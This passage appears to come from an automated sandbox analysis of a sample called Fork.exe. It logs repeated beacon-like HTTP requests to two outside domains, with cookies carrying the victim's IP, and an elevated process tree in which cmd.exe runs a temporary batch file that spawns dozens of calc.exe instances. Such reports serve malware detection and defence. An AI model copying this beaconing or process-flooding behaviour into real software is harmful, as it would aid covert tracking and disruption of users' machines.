Mar 16, 2025 23:04:43.083952904 CET | 300 | OUT | GET /logo.gif?2063744=237732572 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: arimaexim.com
    Cache-Control: no-cache
    Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162680|1742162671|2|4|0; snkz=8.46.123.189
Mar 16, 2025 23:04:43.449911118 CET | 335 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Mar 2025 22:04:43 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162683|1742162671|2|5|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49693 | 3.229.117.57 | 80 | 7112 | C:\Users\user\Desktop\Fork.exe

Timestamp | Bytes transferred | Direction | Data
Mar 16, 2025 23:04:43.821810961 CET | 307 | OUT | GET /logo.gif?263b431=280620375 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: bhagavatirannade.org
    Cache-Control: no-cache
    Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162682|1742162670|2|5|0; snkz=8.46.123.189
Mar 16, 2025 23:04:44.221091986 CET | 342 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Mar 2025 22:04:44 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162684|1742162670|2|6|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49694 | 3.229.117.57 | 80 | 7112 | C:\Users\user\Desktop\Fork.exe

Timestamp | Bytes transferred | Direction | Data
Mar 16, 2025 23:04:44.751832008 CET | 300 | OUT | GET /logo.gif?282bcc5=294857059 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: arimaexim.com
    Cache-Control: no-cache
    Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162683|1742162671|2|5|0; snkz=8.46.123.189
Mar 16, 2025 23:04:45.214785099 CET | 335 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Mar 2025 22:04:45 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162685|1742162671|2|6|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

Session ID: 12 | Source IP: 192.168.2.9 | Source Port: 49696 | Destination IP: 3.229.117.57 | Destination Port: 80 | PID: 7112 | Process: C:\Users\user\Desktop\Fork.exe

Timestamp: Mar 16, 2025 23:04:46.397324085 CET | Bytes transferred: 307 | Direction: OUT
GET /logo.gif?2f2bdaf=494627030 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: bhagavatirannade.org
Cache-Control: no-cache
Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162684|1742162670|2|6|0; snkz=8.46.123.189

Timestamp: Mar 16, 2025 23:04:46.797034979 CET | Bytes transferred: 342 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 16 Mar 2025 22:04:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162686|1742162670|2|7|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 13 | Source IP: 192.168.2.9 | Source Port: 49698 | Destination IP: 3.229.117.57 | Destination Port: 80 | PID: 7112 | Process: C:\Users\user\Desktop\Fork.exe

Timestamp: Mar 16, 2025 23:04:47.492856979 CET | Bytes transferred: 300 | Direction: OUT
GET /logo.gif?3115e42=514698900 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: arimaexim.com
Cache-Control: no-cache
Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162685|1742162671|2|6|0; snkz=8.46.123.189

Timestamp: Mar 16, 2025 23:04:47.932394028 CET | Bytes transferred: 335 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 16 Mar 2025 22:04:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162687|1742162671|2|7|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 14 | Source IP: 192.168.2.9 | Source Port: 49700 | Destination IP: 3.229.117.57 | Destination Port: 80 | PID: 7112 | Process: C:\Users\user\Desktop\Fork.exe

Timestamp: Mar 16, 2025 23:04:49.721376896 CET | Bytes transferred: 307 | Direction: OUT
GET /logo.gif?3925b70=239693248 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: bhagavatirannade.org
Cache-Control: no-cache
Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162686|1742162670|2|7|0; snkz=8.46.123.189

Timestamp: Mar 16, 2025 23:04:50.169111967 CET | Bytes transferred: 342 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 16 Mar 2025 22:04:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162690|1742162670|3|8|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 15 | Source IP: 192.168.2.9 | Source Port: 49704 | Destination IP: 3.229.117.57 | Destination Port: 80 | PID: 7112 | Process: C:\Users\user\Desktop\Fork.exe

Timestamp: Mar 16, 2025 23:04:50.789079905 CET | Bytes transferred: 300 | Direction: OUT
GET /logo.gif?3db8193=582454827 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: arimaexim.com
Cache-Control: no-cache
Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162687|1742162671|2|7|0; snkz=8.46.123.189

Timestamp: Mar 16, 2025 23:04:51.260462046 CET | Bytes transferred: 335 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 16 Mar 2025 22:04:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162691|1742162671|3|8|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 16 | Source IP: 192.168.2.9 | Source Port: 49707 | Destination IP: 3.229.117.57 | Destination Port: 80

Timestamp: Mar 16, 2025 23:04:53.936327934 CET | Bytes transferred: 307 | Direction: OUT
GET /logo.gif?47a8101=225411843 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: bhagavatirannade.org
Cache-Control: no-cache
Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162690|1742162670|3|8|0; snkz=8.46.123.189

Timestamp: Mar 16, 2025 23:04:54.378576994 CET | Bytes transferred: 342 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 16 Mar 2025 22:04:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162694|1742162670|3|9|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 18:04:24
Start date: 16/03/2025
Path: C:\Users\user\Desktop\Fork.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Fork.exe"
Imagebase: 0x400000
File size: 233'472 bytes
MD5 hash: 63B6CEBEFEC52083AC42EB8A39AB6683
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 1
Start time: 18:04:24
Start date: 16/03/2025
Path: C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit): false
Commandline: "fontdrvhost.exe"
Imagebase: 0x7ff712150000
File size: 827'408 bytes
MD5 hash: BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 2
Start time: 18:04:24
Start date: 16/03/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat C:\Users\user\Desktop\Fork.exe"
Imagebase: 0x7ff7102a0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 18:04:25
Start date: 16/03/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff74be10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 18:04:25
Start date: 16/03/2025
Path: C:\Windows\System32\calc.exe
Wow64 process (32bit): false
Commandline: calc.exe
Imagebase: 0x7ff6e2a40000
File size: 27'648 bytes
MD5 hash: 5DA8C98136D98DFEC4716EDD79C7145F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 18:04:25
Start date: 16/03/2025
Path: C:\Windows\System32\calc.exe
Wow64 process (32bit): false
Commandline: calc.exe
Imagebase: 0x7ff6e2a40000
File size: 27'648 bytes
MD5 hash: 5DA8C98136D98DFEC4716EDD79C7145F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 18:04:25
Start date: 16/03/2025
Path: C:\Windows\System32\calc.exe
Wow64 process (32bit): false
Commandline: calc.exe
Imagebase: 0x7ff6e2a40000
File size: 27'648 bytes
MD5 hash: 5DA8C98136D98DFEC4716EDD79C7145F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 7
Start time: 18:04:25
Start date: 16/03/2025
Path: C:\Windows\System32\calc.exe
Wow64 process (32bit): false
Commandline: calc.exe
Imagebase: 0x7ff6e2a40000
File size: 27'648 bytes
MD5 hash: 5DA8C98136D98DFEC4716EDD79C7145F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 8
Start time: 18:04:25
Start date: 16/03/2025
Path: C:\Windows\System32\calc.exe
Wow64 process (32bit): false
Commandline: calc.exe
Imagebase: 0x7ff6e2a40000
File size: 27'648 bytes
MD5 hash: 5DA8C98136D98DFEC4716EDD79C7145F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 9
Start time: 18:04:25
Start date: 16/03/2025
Path: C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit): false
Commandline: "fontdrvhost.exe"
Imagebase: 0x7ff712150000
File size: 827'408 bytes
MD5 hash: BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 10
Start time: 18:04:25
Start date: 16/03/2025
Path: C:\Windows\System32\calc.exe
Wow64 process (32bit): false
Commandline: calc.exe
Imagebase: 0x7ff6e2a40000
File size: 27'648 bytes
MD5 hash: 5DA8C98136D98DFEC4716EDD79C7145F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 11
Start time: 18:04:25
Start date: 16/03/2025
Path: C:\Windows\System32\dwm.exe
Wow64 process (32bit): false
Commandline: "dwm.exe"
Imagebase: 0x7ff62b3c0000
File size: 94'720 bytes
MD5 hash: 5C27608411832C5B39BA04E33D53536C
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 13
Start time: 18:04:27
Start date: 16/03/2025
Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
Imagebase: 0x7ff6826e0000
File size: 4'099'584 bytes
MD5 hash: 94675EB54AC5DAA11ACE736DBFA9E7A2
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 14
Start time: 18:04:27
Start date: 16/03/2025
Path: C:\Windows\System32\calc.exe
Wow64 process (32bit): false
Commandline: calc.exe
Imagebase: 0x7ff6e2a40000
File size: 27'648 bytes
MD5 hash: 5DA8C98136D98DFEC4716EDD79C7145F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 18:04:29
Start date: 16/03/2025
Path: C:\Windows\System32\calc.exe
Wow64 process (32bit): false
Commandline: calc.exe
Imagebase: 0x7ff6e2a40000
File size: 27'648 bytes
MD5 hash: 5DA8C98136D98DFEC4716EDD79C7145F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                        Target ID:16
                                                                        Start time:18:04:30
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:17
                                                                        Start time:18:04:31
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:18
                                                                        Start time:18:04:31
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:19
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:20
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:21
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:22
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:23
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:24
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:25
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:26
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:27
                                                                        Start time:18:04:35
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:28
                                                                        Start time:18:04:36
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:29
                                                                        Start time:18:04:36
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:30
                                                                        Start time:18:04:36
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:31
                                                                        Start time:18:04:36
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:32
                                                                        Start time:18:04:36
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:33
                                                                        Start time:18:04:37
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff65c6e0000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:35
                                                                        Start time:18:04:39
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:36
                                                                        Start time:18:04:39
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:37
                                                                        Start time:18:04:39
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:38
                                                                        Start time:18:04:39
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:39
                                                                        Start time:18:04:42
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:40
                                                                        Start time:18:04:42
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:41
                                                                        Start time:18:04:42
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        No disassembly